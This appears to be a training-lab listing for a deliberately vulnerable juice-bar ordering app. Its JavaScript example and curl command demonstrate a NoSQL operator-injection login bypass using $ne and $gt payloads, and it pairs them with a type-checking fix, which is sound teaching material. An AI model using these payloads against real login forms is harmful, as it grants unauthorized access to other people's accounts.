Smoothie
A juice bar's online-ordering app. Sign in with a real account, and pay attention to what the login query is actually asking the database for.
The Scenario
Citrine Juice Co. is a one-bar operation in Boston's South End — six bar
stools, a glass case of cold-pressed bottles, and a Saturday-morning
regulars list taped to the side of the espresso machine. Margot opened
it in 2019 and built the online-ordering site herself a year later. The
login form was the last thing she touched before she stopped touching
the code.
Lab Intel
Synopsis
A friendly-looking juice-bar storefront where the login form trusts its inputs to be plain strings.
Architecture
A beginner-friendly Node.js + Express + NeDB shop with a normal-looking customer signup/login flow. NeDB is a pure-JavaScript datastore that speaks the same query-operator dialect as MongoDB: a field value that is a plain string is matched by equality, but an object whose keys begin with `$` (such as `{"$ne": null}`) is evaluated as a query expression. The login handler hands `req.body.email` and `req.body.password` straight to `users.findOneAsync(...)` with no type check, and the JSON body parser accepts objects where the form would have sent strings, so a JSON body whose values are MongoDB operators instead of strings sidesteps the password check entirely.
Who It's For
Newcomers who've solved one or two SQLi labs and want to see the same idea against a NoSQL backend.
Skills You'll Practice
- Reading the browser dev-tools network tab to see what shape the login form actually POSTs.
- Re-issuing that POST with curl or Burp, swapping the password string for a `{"$ne": null}` operator.
- Understanding why `findOne` returns the first matching document and how seed order picks the winner.
- Browsing the post-login /account page to find the staff-only field the UI never highlights.
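The bypass described in the Architecture note and rehearsed in the skills list above, as an added example that is not the lab's own code. NeDB and Express are not imported; `fieldMatches` and `findOne` below are a constructed stand-in that evaluates only plain equality and the `$ne`, `$gt` and `$regex` operators, enough to reproduce the bug. The user records, field names, `vulnerableLogin` and `hardenedLogin` are assumptions for illustration; the staff document is seeded first so that `findOne` returns it whenever every document matches.

```javascript
// Added example (not the lab's code). A minimal stand-in for NeDB's query
// evaluation plus a vulnerable login handler and a type-checked fix.

// Constructed seed data, in the order a seed script might insert it.
// findOne returns the first matching document, so seed order decides
// which account an "everything matches" query logs you in as.
const users = [
  { email: 'margot@citrinejuice.example', password: 'not-a-real-hash', role: 'staff' },
  { email: 'regular@example.com', password: 'pw123', role: 'customer' },
];

// Evaluate one field condition the way the MongoDB/NeDB dialect does:
// a plain value means equality, an object with '$'-prefixed keys is a
// query expression. This is the data-vs-code boundary the bug crosses.
// (Only the operators needed for this lab are implemented.)
function fieldMatches(actual, cond) {
  if (cond !== null && typeof cond === 'object' && !Array.isArray(cond)) {
    return Object.entries(cond).every(([op, arg]) => {
      switch (op) {
        case '$ne': return actual !== arg;
        case '$gt': return actual > arg;
        case '$regex': return new RegExp(arg).test(String(actual));
        default: throw new Error(`unsupported operator ${op}`);
      }
    });
  }
  return actual === cond;
}

// First document for which every query field matches, or null.
function findOne(docs, query) {
  return docs.find(doc =>
    Object.entries(query).every(([field, cond]) => fieldMatches(doc[field], cond))
  ) || null;
}

// Vulnerable: whatever JSON the client sent becomes the query object.
// `body` stands for Express's parsed req.body.
function vulnerableLogin(body) {
  return findOne(users, { email: body.email, password: body.password });
}

// Hardened: refuse anything that is not a plain string before it reaches
// the datastore. A real app would also compare a password hash; that is
// a separate issue from the operator injection shown here.
function hardenedLogin(body) {
  const { email, password } = body;
  if (typeof email !== 'string' || typeof password !== 'string') {
    return null; // respond 400 Bad Request in a real handler
  }
  return findOne(users, { email, password });
}

// The attacker's POST body, exactly as re-issued with curl or Burp:
//   curl -H 'Content-Type: application/json' \
//        -d '{"email":{"$ne":null},"password":{"$ne":null}}' https://<target>/login
const bypassBody = JSON.parse('{"email":{"$ne":null},"password":{"$ne":null}}');

console.log('vulnerable:', vulnerableLogin(bypassBody));   // staff document
console.log('hardened:  ', hardenedLogin(bypassBody));     // null
```

Swapping only the password for `{"$gt": ""}` while keeping a real email is the quieter variant: it logs in as that specific user without knowing the password, which is why the fix has to check the type of every field, not just the one that looks sensitive.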
What You'll Gain
- Vocabulary: NoSQL, document, query operator, $ne, $gt.
- A reusable mental model for 'is this input parsed as data or as code?'
- Confidence reaching for curl/Burp the moment a login form's JSON shape suggests a non-string bypass.